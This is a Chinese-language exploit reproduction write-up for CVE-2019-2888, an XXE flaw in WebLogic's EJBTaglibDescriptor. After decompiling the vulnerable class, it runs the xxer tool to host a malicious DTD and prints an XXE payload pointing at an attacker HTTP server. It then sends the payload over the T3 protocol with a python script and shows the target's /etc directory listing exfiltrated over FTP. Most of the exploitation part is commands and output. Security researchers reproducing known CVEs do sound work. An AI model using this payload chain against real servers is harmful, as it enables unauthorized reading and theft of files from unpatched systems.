(CVE-2019-2888)Weblogic EJBTaglibDescriptor XXE漏洞

一、漏洞简介

二、漏洞影响

Weblogic Server 10.3.6.0.0版本、12.1.3.0.0版本和12.2.1.3.0版本的EJB Container组件存在安全漏洞

三、复现过程

fernflower.jar

weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class
╭─root@jas502n /var 
╰─# find ./ |grep EJBTaglibDescriptor                                                                       ✔  8388  18:32:43 
.//weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class
.//weblogic.jar/weblogic/servlet/ejb2jsp/gui/EJBTaglibDescriptorTree.class
.//weblogic.jar/weblogic/servlet/ejb2jsp/gui/EJBTaglibDescriptorPanel.class
╭─root@jas502n /var 
╰─# ls                                                                                                      ✔  8392  18:33:22 
EJBTaglibDescriptor.java fernflower.jar           weblogic.jar

EJBTaglibDescriptor.class to EJBTaglibDescriptor.java

╭─root@jas502n /var 
╰─# java -jar fernflower.jar .//weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class ./
 ./
INFO:  Decompiling class weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor
INFO:  ... done
╭─root@jas502n /var 
╰─# ls            
EJBTaglibDescriptor.java fernflower.jar           weblogic.jar

cat EJBTaglibDescriptor.java

╭─root@jas502n /var 
╰─# cat EJBTaglibDescriptor.java

package weblogic.servlet.ejb2jsp.dd;

import java.io.Externalizable;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.ObjectInput;
import java.io.ObjectOutput;
import java.io.Reader;
import java.io.StringReader;
import java.io.StringWriter;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Enumeration;
import java.util.Iterator;
import java.util.List;
import javax.xml.parsers.DocumentBuilder;
import org.w3c.dom.Element;
import org.xml.sax.InputSource;
import weblogic.servlet.ejb2jsp.BeanGenerator;
import weblogic.servlet.ejb2jsp.EJBMethodGenerator;
import weblogic.servlet.ejb2jsp.EJBTaglibGenerator;
import weblogic.servlet.ejb2jsp.HomeCollectionGenerator;
import weblogic.servlet.ejb2jsp.HomeFinderGenerator;
import weblogic.servlet.ejb2jsp.HomeMethodGenerator;
import weblogic.servlet.internal.dd.ToXML;
import weblogic.utils.Getopt2;
import weblogic.utils.classloaders.ClasspathClassLoader;
import weblogic.utils.io.XMLWriter;
import weblogic.xml.dom.DOMProcessingException;
import weblogic.xml.dom.DOMUtils;
import weblogic.xml.jaxp.WebLogicDocumentBuilderFactory;

public class EJBTaglibDescriptor implements ToXML, Externalizable {
   private static final long serialVersionUID = -9016538269900747655L;
   private FilesystemInfoDescriptor fileInfo;
   private BeanDescriptor[] beans;
   private transient ClassLoader jarLoader;
   private static final String PREAMBLE = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\n<!DOCTYPE ejb2jsp-taglib PUBLIC \"-//BEA Systems, Inc.//DTD EJB2JSP Taglib 1.0//EN\" \"http://www.bea.com/servers/wls600/dtd/weblogic-ejb2jsp.dtd\">";

   static void p(String var0) {
      System.err.println("[EJBTagDesc]: " + var0);
   }

漏洞利用

下载python xxer

https://github.com/ianxtianxt/CVE-2019-2888
info: Starting xxer_httpd on port 8989

info: Starting xxer_ftpd on port 2121

http://10.10.20.100:8989/ext.dtd
python xxer.py -p 8989 -H 10.10.20.100

 _ _ _ _ ___ ___
|_'_|_'_| -_|  _|
|_,_|_,_|___|_|

version 1.1

info: Old DTD found. This file is going to be deleted.
info: Generating new DTD file.
info: Starting xxer_httpd on port 8989
info: Starting xxer_ftpd on port 2121
info: Servers started. Use the following payload (with URL-encoding):

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://10.10.20.100:8989/ext.dtd">%aaa;%ccc;%ddd;]>

通过T3协议,发送序列化后的xml payload

ale@Pentest: ~/Desktop/CVE-2019-2888# python weblogic.py 10.10.20.100 7001                                                 


 _       __     __    __            _         _  ___  __ ______
| |     / /__  / /_  / /___  ____ _(_)____   | |/ / |/ // ____/
| | /| / / _ \/ __ \/ / __ \/ __ `/ / ___/   |   /|   // __/
| |/ |/ /  __/ /_/ / / /_/ / /_/ / / /__    /   |/   |/ /___
|__/|__/\___/_.___/_/\____/\__, /_/\___/   /_/|_/_/|_/_____/
                          /____/

     CVE-2019-2888 WebLogic EJBTaglibDescriptor XXE漏洞

                  python By jas502n



[+] XXE_IP= 10.10.20.166
[+] XXE_IP= 8989
[+] http://10.10.20.166:8989/ext.dtd

connecting to 10.10.20.100 port 7001
sending "t3 12.2.1
AS:255
HL:19
MS:10000000
PU:t3://us-l-breens:7001

"
received "HELO"
sending payload...

ale@Pentest: ~/Desktop/CVE-2019-2888#

get /etc dir info

root@kali:~/xxer# python xxer.py -p 8989 -H 10.10.20.166

 _ _ _ _ ___ ___
|_'_|_'_| -_|  _|
|_,_|_,_|___|_|

version 1.1

info: Old DTD found. This file is going to be deleted.
info: Generating new DTD file.
info: Starting xxer_httpd on port 8989
info: Starting xxer_ftpd on port 2121
info: Servers started. Use the following payload (with URL-encoding):

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://10.10.20.166:8989/ext.dtd">%aaa;%ccc;%ddd;]>


10.10.20.100 - - [01/Nov/2019 12:58:42] "GET /ext.dtd HTTP/1.1" 200 -
info: FTP: recvd 'USER fakeuser'
info: FTP: recvd 'PASS .pwd.lock
adduser.conf
alternatives
apparmor
apparmor.d
apt
bash_completion.d
bash.bashrc
bindresvport.blacklist
blkid.conf
blkid.tab
ca-certificates
ca-certificates.conf
console-setup
cron.d
cron.daily
cron.hourly
cron.monthly
cron.weekly
crontab
dbus-1
debconf.conf
debian_version